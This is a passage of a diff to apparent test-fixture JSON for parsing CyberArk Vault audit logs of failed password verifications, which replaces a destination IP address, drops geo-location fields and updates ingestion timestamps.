Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mysql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:00:07\",\"IsoTimestamp\":\"2021-03-15T18:00:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=Driver\\\\={MySQL ODBC 5.3 Unicode Driver}\\\\;server\\\\=127.0.0.1\\\\;user\\\\=root\\\\;option\\\\=3\\\\;port\\\\=3306\\\\;Password\\\\=1234;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"mysql\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1499,22 +1444,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -1537,7 +1471,7 @@ }, "@timestamp": "2021-03-15T18:05:16.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -1549,28 +1483,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T18:05:16Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"3\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615831516\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"3\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615831516\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "3", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -1579,11 +1513,11 @@ "retries_count": "3", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615831516", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", @@ -1596,9 +1530,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493936Z", - "original": "\u003c7\u003e1 2021-03-15T18:05:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=3;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831516\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:05:16\",\"IsoTimestamp\":\"2021-03-15T18:05:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=3;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831516\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", + "ingested": "2021-12-09T13:37:01.193671600Z", + "original": "\u003c7\u003e1 2021-03-15T18:05:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831516\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:05:16\",\"IsoTimestamp\":\"2021-03-15T18:05:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=3;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831516\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -1621,22 +1555,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -1659,7 +1582,7 @@ }, "@timestamp": "2021-03-16T09:50:19.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -1671,28 +1594,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-16T09:50:19Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" 